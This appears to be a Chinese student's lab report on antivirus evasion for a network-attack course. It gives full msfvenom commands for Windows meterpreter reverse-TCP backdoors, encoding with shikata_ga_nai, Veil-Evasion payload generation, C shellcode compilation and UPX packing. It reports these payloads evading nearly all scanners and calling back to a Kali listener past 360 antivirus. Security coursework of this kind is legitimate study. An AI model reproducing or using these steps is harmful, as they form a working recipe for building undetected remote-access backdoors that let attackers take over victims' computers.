20154319張武璐《網絡對抗》免殺原理與實踐

1、 實踐內容（3.5分）

  1 .正確使用msf編碼器，msfvenom生成如jar之類的其餘文件，veil-evasion，本身利用shellcode編程等免殺工具或技巧；(1.5分)

  2 .經過組合應用各類技術實現惡意代碼免殺(1分)

（若是成功實現了免殺的，簡單語言描述原理，不要截圖。與殺軟共生的結果驗證要截圖。）

  3. 用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本（1分）

2、基礎問題回答

（1）殺軟是如何檢測出惡意代碼的？

答：①基於特徵碼檢測；若是一個可執行文件包含一段特徵碼則被認爲是惡意代碼，過期的特徵碼庫就是沒有用的，所以殺毒軟件的更新很重要。

②啓發式惡意軟件檢測；若是一個軟件乾的事一般是惡意軟件纔會乾的，就可從中獲得啓發，把它看作是惡意軟件。

③基於行爲的惡意軟件檢測；至關因而啓發式的一種，或者是加入了行爲監控的啓發式。

（2）免殺是作什麼？

答：免殺就是經過處理惡意軟件好讓其不被殺毒軟件檢測出來。

（3）免殺的基本方法有哪些？

答：①改變特徵碼；若只有exe能夠經過加殼，包括壓縮殼和加密殼來改變特徵碼。如有源代碼，可用其餘語言進行從新再編譯（veil-evasion）。

②改變行爲；通信方式儘可能使用反彈式鏈接、隧道技術或者加密通信數據。操做模式最好基於內存操做，減小對系統的修改，加入混淆做用的正常功能代碼。

3、實驗體會

1.經過實驗深入的感受到殺毒軟件其實很弱啊，我都能生成免殺的程序，更加令我吃驚的是竟然有程序能夠在那麼多殺毒軟件檢測中僅被檢測出爲安全，讓我以爲本身的電腦一直處在極度危險的狀態中，網絡安全仍是很重要的啊！

2.遇到的問題，就是生成zwl.exe文件，一開始電腦管家檢測不出來，過一段時間再次運行就被提示爲木馬程序刪除了，可是再次用c語言生成exe程序，仍是能夠用的，就是周而復始。求解釋！！！

4、離實戰還缺些什麼技術或步驟

     1.咱們要成功監聽的話必需要靶機啓動可執行文件，能夠經過下載軟件的時候能夠捆綁到軟件上，可是執行仍是有必定難度的。

     2.如今的殺毒軟件的各類特徵庫更新的很快，要想達到實戰還須要作到靈活更新。

5、實驗過程

（一）正確使用msf編碼器，veil-evasion，本身利用shellcode編程等免殺工具或技巧

本機IP：192.168.199.187

Linux的IP：192.168.199.132

1.msfvenom直接生成meterpreter可執行文件

（1）查看用msfvenom指令： msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.132 LPORE=4319 -f exe > 154319_backdoor.exe 生成的後門可執行文件的免殺效果

（2）打開網址在http://www.virscan.org/網站上查一下這個病毒能被多少殺軟檢測出來，發現有48%的殺軟（19/39）報告發現病毒，說明這種方式造成的後門免殺效果不好

2.Msfvenom使用編碼器生成meterpreter可執行文件

（1）msfvenom使用編碼器，輸入指令： msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.199.132 LPORT=4319 -f exe > 1543190_backdoor.exe

（2） 查看生成的後門文件的免殺效果，發現有48%的殺軟（19/39）報告發現病毒，我覺得說編碼會下降檢出率，結果卻差很少，沒有什麼變化

3.屢次編碼

（1）嘗試多編碼幾回，輸入指令： msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b  ‘\x00’ LHOST=192.168.199.132 LPORT=4319 -f exe > 15431900_backdoor.exe

（2） 查看生成的後門文件的免殺效果，網站上顯示個人病毒名字有違法或廣告關鍵字，因此修改病毒名稱爲1543191

（3）發現有46%的殺軟（18/39）報告發現病毒，看來多編碼幾回也並無什麼用

（二）使用Veil-Evasion生成可執行文件（Linux地址：172.30.5.74）

1.Veil-Evasion是一個免殺平臺，與Metasploit有點相似，默認沒裝

2..安裝veil-evasion

參考網址：http://www.freebuf.com/sectool/89024.html

3.輸入指令： veil-evasion ，打開軟件，自動列出可用的指令

4.輸入use選擇34 python/meterpreter/rev_tcp

5.設置反彈回連的IP爲172.30.5.74：和端口號爲：4319

6.輸入指令 generate ,設置生成的可執行文件名爲zwl356：,並選擇使用pathon語言進行編寫

7.在/var/lib/veil-evasion/output/compiled/下找到zwl1文件，生成exe文件，傳到Windows檢測

（接下來是見證奇蹟的時刻？？）

檢驗免殺效果，發現只有2%的殺軟（1/39）報告發現病毒，Veil-Evasion的免殺效果這麼好，我竟然生成了一個判斷爲非病毒的程序

 

 

（三）C語言調動shellcode（Linux地址：172.30.3.132  和 192.168.199.132）

（1）使用指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.3.132 LPORT=443 -f c , 會生成一個c語言格式的Shellcode數組

 

(2)將這些特徵碼複製到windows上,用Dev-C++加上主函數後編譯運行生成的可執行文件

 

（3）運行zwl.exe文件，沒有提示木馬文件

（4）用電腦管家查殺，沒有被發現

（5）在網址http://www.virscan.org/查看發現有10%的殺軟（4/39）報告發現病毒，比以前的結果好不少，不少殺毒軟件檢測不出

（6）運行回連kali,回連成功

（7）在過一段時間，再下一次運行zwl.exe程序時，被檢測出爲木馬程序被清除

（8）用upx加殼，命名爲zwl_jiake.exe

（9）檢測加殼後的程序免殺效果，發現沒有殺軟（0/39）報告發現病毒（奇蹟+1）

（四）用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本

版本：

殺軟：360殺毒

1.將後門程序傳到靶機的電腦上，回連個人kali

2.檢查免殺效果，發現360殺毒沒有檢測出來，免殺成功